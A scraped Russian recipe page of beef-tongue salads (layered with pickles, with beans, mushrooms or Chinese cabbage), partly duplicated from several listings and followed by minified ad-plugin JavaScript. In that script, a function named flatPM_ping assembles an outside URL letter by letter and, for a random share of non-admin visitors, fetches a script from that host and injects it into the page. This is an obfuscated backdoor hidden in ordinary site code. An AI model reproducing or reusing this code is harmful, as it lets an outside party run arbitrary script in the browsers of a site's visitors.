Салат из говяжьего языка с солеными огурцами

Салат из говяжьего языка с солеными огурцами

Ингредиенты

Говяжий язык – 250 г

Яйца куриные – 2 шт.

Соленые огурцы – 1 шт.

Пекинская капуста – несколько листов

Грецкие орехи – 20 г

Чеснок – 1 зубок

  • 202 кКал
  • 50 мин.
  • 50 мин.

Фото готового блюда

Пошаговый рецепт с фото

Говяжий язык можно подавать на стол как самостоятельную закуску, это всегда вкусно и презентабельно на столе. Но также с ним можно готовить всевозможные салаты. Некоторые добавляют его в оливье вместо колбасы, такая замена будет не только вкусной, но и намного полезнее.

Но кроме такого использования, с языком можно готовить множество других салатов. Мне не очень нравятся многокомпонентные тяжелые салаты, а салат из говяжьего языка с солёными огурцами не содержит в себе слишком много ингредиентов, поэтому в моем списке салатов для праздников он присутствует. К тому же я люблю не смешивать все продукты, а укладывать слоями, промазывая небольшим количеством майонеза, то есть подавать его порционно. Как приготовить салат, я расскажу в своем рецепте, а как подавать его – решать уже вам самим.

Для салата берем необходимые продукты по списку.

Язык лучше всего отварить заранее, например за день до приготовления самого салата. Время приготовления в рецепте указано без времени отваривания языка. Коснусь этого процесса вкратце.

Время варки зависит от возраста животного и, соответственно, от размера языка. Я отваривала половину говяжьего языка весом около 500 граммов, половинку от этого веса я использовала для бутербродов, а вторую половинку – для салата. Варился кусок языка около 2-х часов. В бульон обязательно добавляем луковицу, лавровый лист, перец горошком и соль.

С отваренного языка снимаем шкурку и даем ему остыть. Храним в холодильнике до момента использования. Для салата нарезаем язык тонкой соломкой.

Листья пекинской капусты моем, обтираем полотенцем или салфеткой, чтобы убрать ненужную влагу.

Для заправки смешаем майонез с раздавленным или мелко нарубленным чесноком.

Листья пекинки рвем руками на небольшие кусочки и укладываем в формочку. Можно немного посолить.

Теперь на листья укладываем порезанный говяжий язык.

Смазываем заправкой из майонеза с чесноком.

Режем соленый огурец тоже тонкой соломкой.

Укладываем его следующим слоем нашего салата.

Яйца для салата также необходимо заранее отварить. Нарезаем яйца кубиком.

Укладываем порезанные яйца следующим слоем из расчета одно яйцо на порцию.

Еще раз смазываем все майонезом.

Теперь опять рвем руками листья пекинской капусты и размещаем их на этом майонезном слое.

Последним слоем идут грецкие орехи. Для использования в любых салатах орешки лучше слегка поджарить на сковороде, так они становятся намного вкуснее. Порубим обжаренные орешки не слишком мелко и посыпаем их сверху.

Сейчас можно уже аккуратно снять форму и нанести последние штрихи майонеза. Можно использовать обычный пакет, отрезав у него уголок, или кондитерский мешок.

Вот и все, салат из говяжьего языка с солеными огурцами готов, его можно подавать на стол.

Салат из говяжьего языка с солеными огурцами

Это рецепт самого вкусного салата с отварным говяжьим языком и маринованными огурцами, хозяйки часто дают ему название “Пальчики оближешь”. Для его приготовления не понадобится большой и дорогостоящий набор продуктов, а результат получается просто невероятным.

Ингредиенты

  • 2 средние свеклы
  • 3 морковки
  • 3 картофелины
  • 250-300 гр говяжьего языка
  • 200 гр консервированного горошка
  • несколько перьев зеленого лука

Заправка для салата с говяжьим языком :

  • 100 мл чистой воды
  • 3 ст.л. лимонного сока
  • 2 ст.л. растительного масла
  • пол-ч.л. соли
  • 1/3 ч.л. сахара (желательно коричневого)

Рецепт приготовления блюда в домашних условиях

Похожие рецепты:

Печеный чеснок: рецепт с фото

Закуска “Муравьи на бревне”: рецепт с фото

Рулет из лаваша с печенью трески: рецепт с фото

Помидоры запеченные с рисом: рецепт с фото

Чесночные стрелки с овощами: рецепт с фото

Закуска “Помидоры с творожной начинкой”: рецепт с фото

Ваши отзывы и советы

Новое на сайте:

К сезону десертов:

180 мин. / Сложно

480 мин. / Сложно

480 мин. / Средне

120 мин. / Средне

480 мин. / Сложно

Мы в соцсетях

FOODideas (идеи для еды) – это сайт, посвящённый искусству приготовления пищи дома, где собраны лучшие рецепты кулинарных блюд с фотографиями и подробными пошаговыми инструкциями, специально, чтобы вы могли приготовить любое, даже самое сложное блюдо в домашних условиях. Так же наши рецепты вы можете читать в нашем Яндекс Дзен канале – Foodideas Zen

Салат с языком — 7 очень вкусных рецептов языка в салате

Салат с языком — очень вкусное и изысканное блюдо. Я знаю, что многие мои знакомые ищут его, чтобы купить заранее к новогоднему столу. Если гости узнают о том, что среди обычных мясных салатов есть блюдо с языком, то пробуют его всегда первым.

Попробуйте и вы приготовить язык в салате, чтобы загадать эту загадку гостям за праздничным столом: Какое мясо вы кушаете ? Приготовить такой салат можно с разными вкусовыми сочетаниями в зависимости от состава ингредиентов и разной заправки.

  • Салат с языком говяжьим — очень вкусный рецепт без майонеза
  • Рецепт салата с фасолью и языком
  • Салат из языка с шампиньонами
  • Видео о том, как приготовить салат из языка и свежего огурца
  • Рецепт салата из пекинской капусты с языком

Салат с языком говяжьим — очень вкусный рецепт без майонеза

Ни для кого не секрет, что домашний рецепт приготовления, это всегда вкусно.

Ингредиенты:

  • Говяжий язык — 1 шт.
  • Картофель — 3 шт.
  • Яйцо — 2 шт.
  • Морковь — 2 шт.
  • Корень сельдерея — 1 шт.
  • Соленый огурец — 1 шт.
  • Лимонный сок — 60 мл
  • Растительное масло — 80 мл
  • Вода, петрушка, соль

Приготовление:

  1. Вымойте язык, чтобы потом отварить его в подсоленной воде.
  2. Затем язык достаньте из бульона и опустите на несколько секунд в холодную воду.
  3. Далее очистите его от кожи, чтобы нарезать тонкими ломтиками.
  4. Сварите: морковь, картофель, сельдерей, чтобы очистить их и нарезать кубиками.
  5. Соленый огурчик тоже нарежьте кубиками.
  6. Все приготовленные компоненты соедините вместе в салатнице.
  7. Сверху полейте соком лимона, смешанным с растительным маслом.
  8. Еще салат посолите и хорошо все перемешайте.

Готовое блюдо посыпьте нарезанными петрушкой и яйцами.

Рецепт салата с фасолью и языком

Ингредиенты:

  • Язык телячий — 1 шт.
  • Фасоль — 1/2 стакана
  • Морковь — 3 шт.
  • Картофель — 4 шт.
  • Корень сельдерея — 1 шт.
  • Соленые огурцы — 2 шт.
  • Майонез — по вкусу

Приготовление рецепта:

  1. Тщательно промойте язык, чтобы сварить его в подсоленной воде.
  2. Потом охладите его и нарежьте тоненькими ломтиками.
  3. Отдельно сварите все овощи и корень сельдерея, чтобы нарезать их потом кубиками.
  4. К овощам добавьте еще нарезанные кубиками соленые огурцы.
  5. Все подготовленные овощи смешайте с нарезанным языком в миске.
  6. Затем все ингредиенты заправьте майонезом и выложите в салатник.
  7. Посыпьте мелко нарезанной зеленью петрушки.

Можете украсить блюдо рубленными яйцами или солеными огурцами, нарезанными кружочками.

Салат из языка с шампиньонами

Ингредиенты:

  • Вареный язык — 150 г
  • Вареное мясо курицы — 300 г
  • Шампиньоны вареные — 150 г
  • Спаржа консервированная — 100 г
  • Зелень сельдерея — 100 г
  • Майонез — 200 г

Приготовление:

  1. Язык и мясо курицы мелко нарежьте.
  2. Зелень сельдерея промойте, нарежьте и отожмите через салфетку.
  3. Все компоненты смешайте и смешайте с майонезом.
  4. Еще добавьте соль, молотый перец, имбирь, кардамон, мускатный орех.
  5. Вкусный салат с языком готов.

Украсьте зеленью укропа.

Видео о том, как приготовить салат из языка и свежего огурца

Посмотрите рецепт вкусной закуски, которая будет отличным дополнением к семейному ужину.

При удачном сочетании продуктов, получается сытный салат с языком со вкусом свежего огурчика.

Рецепт салата из пекинской капусты с языком

Ингредиенты:

  • Пекинская капуста — 1/2 кочана
  • Говяжий язык — 300 г
  • Листья салата
  • Помидоры черри — 15 шт.
  • Чеснок — 4 зубчика
  • Сок 1/2 лимона
  • Зернистая горчица — 2 ч. л.
  • Соевый соус — 2 ст. л.
  • Сахар — 2 ч. л.
  • Растительное масло — 100 мл
  • Укроп — 1 пучок
  • Перец, соль — по вкусу

Приготовление:

Приготовьте заправку для салата. Для этого в миске смешайте следующие компоненты, а именно: растительное масло, соевый соус, зернистую горчицу, сок лимона, сахар, выдавленный чеснок и перец. Перемешайте, попробуйте и откорректируйте вкус. Поставьте на время в холодильник.

Возьмите необходимое количество листьев пекинской капусты и нарежьте их ножом или порвите руками. Уложите кусочки в чашку.

Еще добавьте кусочки листьев сиреневого салата, чтобы создать контраст цвета среди ингредиентов.

Язык отварите в подсоленной воде со специями. Потом охладите, очистите и нарежьте тонкими полосками, чтобы положить к листьям капусты.

Помидоры черри разрежьте пополам и положите в чашку к языку. Добавьте нарезанный мелко укроп.

Все ингредиенты в чашке перемешайте.

Перед подачей поливайте заправкой, чтобы увидеть приятную улыбку гостя.

Салат из говяжьего языка с солеными огурцами

Это рецепт самого вкусного салата с отварным говяжьим языком и маринованными огурцами, хозяйки часто дают ему название “Пальчики оближешь”. Для его приготовления не понадобится большой и дорогостоящий набор продуктов, а результат получается просто невероятным.

Ингредиенты

  • 2 средние свеклы
  • 3 морковки
  • 3 картофелины
  • 250-300 гр говяжьего языка
  • 200 гр консервированного горошка
  • несколько перьев зеленого лука

Заправка для салата с говяжьим языком :

  • 100 мл чистой воды
  • 3 ст.л. лимонного сока
  • 2 ст.л. растительного масла
  • пол-ч.л. соли
  • 1/3 ч.л. сахара (желательно коричневого)

Рецепт приготовления блюда в домашних условиях

Похожие рецепты:

Печеный чеснок: рецепт с фото

Закуска “Муравьи на бревне”: рецепт с фото

Рулет из лаваша с печенью трески: рецепт с фото

Помидоры запеченные с рисом: рецепт с фото

Чесночные стрелки с овощами: рецепт с фото

Закуска “Помидоры с творожной начинкой”: рецепт с фото

Ваши отзывы и советы

Новое на сайте:

К сезону десертов:

180 мин. / Сложно

480 мин. / Сложно

480 мин. / Средне

120 мин. / Средне

480 мин. / Сложно

Мы в соцсетях

FOODideas (идеи для еды) – это сайт, посвящённый искусству приготовления пищи дома, где собраны лучшие рецепты кулинарных блюд с фотографиями и подробными пошаговыми инструкциями, специально, чтобы вы могли приготовить любое, даже самое сложное блюдо в домашних условиях. Так же наши рецепты вы можете читать в нашем Яндекс Дзен канале – Foodideas Zen

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Оцените рецепт ОценитьПрименить
Оцените рецепт ОценитьПрименить